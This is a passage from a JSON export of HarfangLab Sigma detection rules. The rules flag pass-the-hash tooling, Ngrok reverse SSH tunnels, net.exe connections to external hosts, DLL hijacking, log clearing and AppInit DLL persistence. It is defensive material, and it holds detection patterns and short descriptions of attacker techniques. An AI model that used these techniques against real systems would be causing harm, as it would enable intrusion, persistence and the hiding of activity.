"rule_description": "Detects various malicious commandlets in PowerShell scripts, generally associated with the Invoke-TheHash module.\nInvoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB attacks through the .NET TCPClient.\nAuthentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol.\nIt is recommended to check other PowerShell command and the process behavior for suspicious activities.\n",
"rule_creation_date": "2022-10-12",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1550.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1d329a59-c1ee-4f62-baac-4db01284ac5e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083089Z",
"creation_date": "2026-03-23T11:45:34.083091Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083096Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.securonix.com/blog/securonix-threat-labs-security-advisory-threat-actors-target-mssql-servers-in-dbjammer-to-deliver-freeworld-ransomware/",
"https://attack.mitre.org/techniques/T1570/",
"https://attack.mitre.org/techniques/T1048/",
"https://attack.mitre.org/software/S0039/"
],
"name": "t1570_suspicious_network_connection_net.yml",
"content": "title: Suspicious Network Connection by net.exe\nid: 1d329a59-c1ee-4f62-baac-4db01284ac5e\ndescription: |\n Detects suspicious network connections initiated by net.exe to an external IP address.\n Adversaries can mount remote network share to transfer files to and from the targeted system.\n It is recommended to look for any other malicious behavior on the target host, as well as to look for the reputation of the IP address contacted by net.exe.\nreferences:\n - https://www.securonix.com/blog/securonix-threat-labs-security-advisory-threat-actors-target-mssql-servers-in-dbjammer-to-deliver-freeworld-ransomware/\n - https://attack.mitre.org/techniques/T1570/\n - https://attack.mitre.org/techniques/T1048/\n - https://attack.mitre.org/software/S0039/\ndate: 2023/09/05\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1570\n - attack.exfiltration\n - attack.t1048\n - attack.s0039\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Behavior.NetworkActivity\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.FileDownload\nlogsource:\n product: windows\n category: network_connection\ndetection:\n selection:\n ProcessImage|endswith: '\\net.exe'\n ProcessCommandLine|re:\n - ' \\\\\\\\[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\\\' # IP\n - ' \\\\\\\\\\S+\\.([a-zA-Z]{2,63}|[xX][nN]--[a-zA-Z0-9-]{1,59})\\\\' # Domain\n - ' http(s|)://' # HTTP\n DestinationIsIpv6: 'false'\n\n filter_ip:\n DestinationIp|cidr:\n - '127.0.0.0/8' # RFC1122\n - '192.168.0.0/16' # RFC1918\n - '172.16.0.0/12' # RFC1918\n - '10.0.0.0/8' # RFC1918\n - '169.254.0.0/16' # RFC3927\n - 'fe80::/10'\n - '100.64.0.0/10' # RFC6598\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1d329a59-c1ee-4f62-baac-4db01284ac5e",
"rule_name": "Suspicious Network Connection by net.exe",
"rule_description": "Detects suspicious network connections initiated by net.exe to an external IP address.\nAdversaries can mount remote network share to transfer files to and from the targeted system.\nIt is recommended to look for any other malicious behavior on the target host, as well as to look for the reputation of the IP address contacted by net.exe.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-03-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.exfiltration",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1048",
"attack.t1570"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1d38f72c-c5fe-4c2b-b710-12190bf78d90",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612190Z",
"creation_date": "2026-03-23T11:45:34.612194Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612201Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/hakluke/status/1679023050526687244",
"https://twitter.com/malmoeb/status/1519710302820089857",
"https://www.huntress.com/blog/abusing-ngrok-hackers-at-the-end-of-the-tunnel",
"https://attack.mitre.org/techniques/T1572/",
"https://attack.mitre.org/techniques/T1090/",
"https://attack.mitre.org/techniques/T1567/",
"https://attack.mitre.org/software/S0508/"
],
"name": "t1090_linux_ngrok_ssh.yml",
"content": "title: Ngrok Tunnel via SSH (Linux)\nid: 1d38f72c-c5fe-4c2b-b710-12190bf78d90\ndescription: |\n Detects a connection to the official Ngrok Tunnel Server using the SSH command-line tool.\n Ngrok is a tool that allows users to expose their local servers to the internet, which enables attackers to tunnel malicious traffic through an otherwise secure network.\n It isn't necessary to download the Ngrok binary to use an Ngrok tunnel, this can be done by creating a reverse SSH tunnel to the Ngrok servers.\n It is recommended to investigate this action to determine its legitimacy.\n If you believe this to be an indicator of malicious activity, it is recommended to investigate which users were compromised and what resources the attacker accessed using this tunnel.\nreferences:\n - https://twitter.com/hakluke/status/1679023050526687244\n - https://twitter.com/malmoeb/status/1519710302820089857\n - https://www.huntress.com/blog/abusing-ngrok-hackers-at-the-end-of-the-tunnel\n - https://attack.mitre.org/techniques/T1572/\n - https://attack.mitre.org/techniques/T1090/\n - https://attack.mitre.org/techniques/T1567/\n - https://attack.mitre.org/software/S0508/\ndate: 2023/07/13\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1090\n - attack.t1572\n - attack.exfiltration\n - attack.t1567\n - attack.s0508\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Tool.Ngrok\n - classification.Linux.Behavior.Tunneling\n - classification.Linux.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/ssh'\n CommandLine|contains:\n - 'tunnel.??.ngrok.com'\n - 'tunnel.ngrok.com'\n - '.ngrok-agent.com'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1d38f72c-c5fe-4c2b-b710-12190bf78d90",
"rule_name": "Ngrok Tunnel via SSH (Linux)",
"rule_description": "Detects a connection to the official Ngrok Tunnel Server using the SSH command-line tool.\nNgrok is a tool that allows users to expose their local servers to the internet, which enables attackers to tunnel malicious traffic through an otherwise secure network.\nIt isn't necessary to download the Ngrok binary to use an Ngrok tunnel, this can be done by creating a reverse SSH tunnel to the Ngrok servers.\nIt is recommended to investigate this action to determine its legitimacy.\nIf you believe this to be an indicator of malicious activity, it is recommended to investigate which users were compromised and what resources the attacker accessed using this tunnel.\n",
"rule_creation_date": "2023-07-13",
"rule_modified_date": "2025-01-09",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1090",
"attack.t1567",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1d3f9140-d12e-4ac2-ae0f-302dc6ba9c21",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.099280Z",
"creation_date": "2026-03-23T11:45:34.099282Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.099286Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_synchost.yml",
"content": "title: DLL Hijacking via synchost.exe\nid: 1d3f9140-d12e-4ac2-ae0f-302dc6ba9c21\ndescription: |\n Detects potential Windows DLL Hijacking via synchost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'synchost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\policymanager.dll'\n - '\\PROPSYS.dll'\n - '\\USERENV.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1d3f9140-d12e-4ac2-ae0f-302dc6ba9c21",
"rule_name": "DLL Hijacking via synchost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via synchost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1d42a517-fd7d-4aa1-bdea-8bb23464d866",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627863Z",
"creation_date": "2026-03-23T11:45:34.627866Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627886Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1070/001/"
],
"name": "t1070_001_clear_windows_application_log_no_process.yml",
"content": "title: Windows Application Log Cleared\nid: 1d42a517-fd7d-4aa1-bdea-8bb23464d866\ndescription: |\n Detects when one of the Windows application logs is cleared by an unknown process.\n Windows Event Logs are a record of a computer's alerts and notifications.\n Adversaries may clear Windows Event Logs to hide the activity of an intrusion.\n It is recommended to investigate the process responsible for this action as well as to look for suspicious activities on the host preceding the clearing of the logs.\nreferences:\n - https://attack.mitre.org/techniques/T1070/001/\ndate: 2026/01/15\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n service: system\ndetection:\n selection:\n EventID: 104\n Source: Microsoft-Windows-Eventlog\n\n # This is handled by the rule 43a740ac-2e54-4653-84a7-349b469a0a35\n filter_process:\n ProcessImage|contains: '?'\n\n exclusion_channel:\n Channel:\n - 'ModemAuthenticatorLog'\n - 'Microsoft-Exchange-ManagedAvailability/ThrottlingConfig'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1d42a517-fd7d-4aa1-bdea-8bb23464d866",
"rule_name": "Windows Application Log Cleared",
"rule_description": "Detects when one of the Windows application logs is cleared by an unknown process.\nWindows Event Logs are a record of a computer's alerts and notifications.\nAdversaries may clear Windows Event Logs to hide the activity of an intrusion.\nIt is recommended to investigate the process responsible for this action as well as to look for suspicious activities on the host preceding the clearing of the logs.\n",
"rule_creation_date": "2026-01-15",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1d5ccdaa-b937-4d62-a941-fc69637a870a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605699Z",
"creation_date": "2026-03-23T11:45:34.605702Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605710Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/09cef802316c0db576963b2742b506a9f274f4ae/atomics/T1614.001/T1614.001.md",
"https://attack.mitre.org/techniques/T1614/001/",
"https://attack.mitre.org/techniques/T1480/"
],
"name": "t1614_001_system_language_discovery_chcp.yml",
"content": "title: System Language Discovered via chcp\nid: 1d5ccdaa-b937-4d62-a941-fc69637a870a\ndescription: |\n Detects the identification of the system language using the chcp utility.\n Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host.\n It is recommended to analyze the parent process to look for malicious content or other suspicious actions.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/09cef802316c0db576963b2742b506a9f274f4ae/atomics/T1614.001/T1614.001.md\n - https://attack.mitre.org/techniques/T1614/001/\n - https://attack.mitre.org/techniques/T1480/\ndate: 2022/12/23\nmodified: 2025/10/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1480\n - attack.discovery\n - attack.t1614\n - attack.t1614.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'CHCP.COM'\n CommandLine: 'chcp'\n\n exclusion_programfiles:\n GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_grandparent:\n GrandparentImage:\n - '?\\Users\\\\*\\AppData\\Local\\Ankama\\Retro\\Dofus Retro.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\RingCentral\\RingCentral.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\oz-client\\Poly Lens.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\shadow\\Shadow.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\RealtimeBoard\\\\*\\Miro.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\gitkraken\\app-*\\gitkraken.exe'\n - '?:\\Windows\\Prey\\versions\\\\*\\bin\\node.exe'\n - '*\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Blitz\\Blitz.exe'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Sky\\Sky Go\\Sky Go.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\monsisraapp\\MonSisra2.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\monsisra\\MonSisra2.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\MonSisra2\\MonSisra2.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\Program Files\\NSClient++\\nscp.exe'\n - '\\UCMDB\\DataFlowProbe\\bin\\jre\\bin\\discovery_probe.exe|'\n - '?:\\Program Files\\GLPI-Agent\\perl\\bin\\glpi-agent.exe'\n - '?:\\Program Files (x86)\\CheckPoint\\Endpoint Connect\\openmail.exe'\n\n exclusion_commandline:\n - ParentCommandLine:\n - '?:\\windows\\system32\\cmd.exe /d /s /c chcp'\n - '?:\\Windows\\System32\\cmd.exe /D /C chcp'\n - 'cmd.exe /x/d/c chcp'\n - 'cmd.exe /d /s /c chcp'\n - GrandparentCommandLine:\n - '?:\\WINDOWS\\system32\\cmd.exe /d /c ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*.bat'\n - '?:\\windows\\system32\\cmd.exe /d /c ?:\\ProgramData\\\\*\\\\*.bat'\n - '?:\\windows\\system32\\cmd.exe /d /c ?:\\windows\\TEMP\\\\*\\\\*.bat'\n - '?:\\Windows\\System32\\cmd.exe /c *\\Bruker\\TopSpin*\\\\*'\n\n exclusion_parsys:\n CurrentDirectory|contains: 'parsys'\n GrandparentImage|endswith: '\\station.exe'\n\n exclusion_smadmin:\n ParentCommandLine|contains: '\\SMadmin\\'\n\n exclusion_anaconda:\n - GrandparentCommandLine|contains: '\\anaconda'\n - Ancestors|contains:\n - '\\anaconda3\\Scripts\\conda.exe|'\n - '\\Anaconda\\Scripts\\conda.exe|'\n - '\\miniconda\\Scripts\\conda.exe|'\n - '\\miniconda3\\Scripts\\conda.exe|'\n\n exclusion_vray:\n CurrentDirectory|contains: '\\V-Ray\\'\n\n exclusion_googlecloud:\n CurrentDirectory|contains: '\\Google\\Cloud SDK\\'\n\n exclusion_autodesk:\n GrandparentImage|endswith: '\\Autodesk Installer.exe'\n\n exclusion_varian:\n GrandparentCommandLine|contains:\n - '?:\\Program Files\\Varian\\'\n - '?:\\Program Files (x86)\\Varian\\'\n\n exclusion_unity:\n CurrentDirectory|startswith:\n - '?:\\Program Files\\Unity\\Hub\\Editor\\'\n - '?:\\Program Files (x86)\\Unity\\Hub\\Editor\\'\n\n exclusion_postgres:\n GrandparentCommandLine: '?:\\windows\\system32\\cmd.exe /c ?:\\Program Files\\PostgreSQL\\\\??\\scripts\\runpsql.bat'\n\n exclusion_discord:\n ParentCommandLine: '?:\\windows\\system32\\cmd.exe /d /s /c chcp'\n GrandparentCommandLine:\n - '*\\Discord\\app-*\\Discord.exe'\n # Discord.exe --overlay-host\n - '*\\Discord\\app-*\\Discord.exe *'\n\n exclusion_node:\n - ProcessGrandparentOriginalFileName: 'node.exe'\n - Ancestors|contains: '|?:\\Program Files\\nodejs\\node.exe|'\n\n exclusion_schedule:\n - GrandparentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - ProcessParentGrandparentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1d5ccdaa-b937-4d62-a941-fc69637a870a",
"rule_name": "System Language Discovered via chcp",
"rule_description": "Detects the identification of the system language using the chcp utility.\nAdversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host.\nIt is recommended to analyze the parent process to look for malicious content or other suspicious actions.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2025-10-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1480",
"attack.t1614",
"attack.t1614.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1d9e6035-5064-4ba3-8bf6-1759b2641f54",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598091Z",
"creation_date": "2026-03-23T11:45:34.598097Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598110Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://slyd0g.medium.com/understanding-and-defending-against-reflective-code-loading-on-macos-e2e83211e48f",
"https://attack.mitre.org/techniques/T1620/"
],
"name": "t1620_reflective_loading_file.yml",
"content": "title: Suspicious Executable Reflective Loading File Created\nid: 1d9e6035-5064-4ba3-8bf6-1759b2641f54\ndescription: |\n Detects the creation of a specific file related to reflective binary execution on macOS.\n Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads.\n It is recommended to check for malicious activities by the process creating the file.\nreferences:\n - https://slyd0g.medium.com/understanding-and-defending-against-reflective-code-loading-on-macos-e2e83211e48f\n - https://attack.mitre.org/techniques/T1620/\ndate: 2024/04/03\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1620\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.MemoryExecution\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection:\n Path|contains: '/NSCreateObjectFileImageFromMemory-'\n Kind: 'create'\n ProcessImage|contains: '?'\n\n exclusion_common_folders:\n ProcessImage|startswith:\n - '/System/Library/'\n - '/Library/Application Support/'\n - '/library/frameworks/'\n - '/Applications/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1d9e6035-5064-4ba3-8bf6-1759b2641f54",
"rule_name": "Suspicious Executable Reflective Loading File Created",
"rule_description": "Detects the creation of a specific file related to reflective binary execution on macOS.\nAdversaries may reflectively load code into a process in order to conceal the execution of malicious payloads.\nIt is recommended to check for malicious activities by the process creating the file.\n",
"rule_creation_date": "2024-04-03",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1620"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1dff2e4d-9edd-4b48-af83-6c559ea3e9c5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075932Z",
"creation_date": "2026-03-23T11:45:34.075934Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075938Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://pentestlab.blog/2020/01/07/persistence-appinit-dlls/",
"https://attack.mitre.org/techniques/T1546/010/"
],
"name": "t1546_010_persistence_registry_appinit_dlls.yml",
"content": "title: Registry AppInit DLLs Modified\nid: 1dff2e4d-9edd-4b48-af83-6c559ea3e9c5\ndescription: |\n Detects the modification of the AppInit_DLLs or LoadAppInit_DLLs keys in registry.\n Attackers may establish persistence by loading malicious libraries (DLL) via AppInit DLLs.\n This functionality allows custom libraries (DLL) to be loaded into the address space of every process that loads user32.dll.\n It is recommended to analyze the process responsible for the registry and the library pointed to by the registry value to look for malicious content or actions.\nreferences:\n - https://pentestlab.blog/2020/01/07/persistence-appinit-dlls/\n - https://attack.mitre.org/techniques/T1546/010/\ndate: 2020/09/24\nmodified: 2025/05/19\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.010\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_registry:\n EventType: SetValue\n\n selection_loadappinit:\n TargetObject:\n - 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs'\n - 'HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs'\n\n filter_loadappinit:\n # For LoadAppInit_DLLs all values != zero are valid\n Details: 'DWORD (0x00000000)'\n\n selection_key_appinit:\n TargetObject:\n - 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs'\n - 'HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs'\n\n selection_key_requiresignedappinit:\n TargetObject:\n - 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\RequireSignedAppInit_DLLs'\n - 'HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\RequireSignedAppInit_DLLs'\n Details: 'DWORD (0x00000000)'\n\n exclusion_empty:\n Details:\n - '(Empty)'\n - ''\n - '\\n'\n\n exclusion_nvidia_appinit:\n TargetObject|endswith: '\\AppInit_DLLs'\n Image:\n - '?:\\Windows\\System32\\nvvsvc.exe'\n - 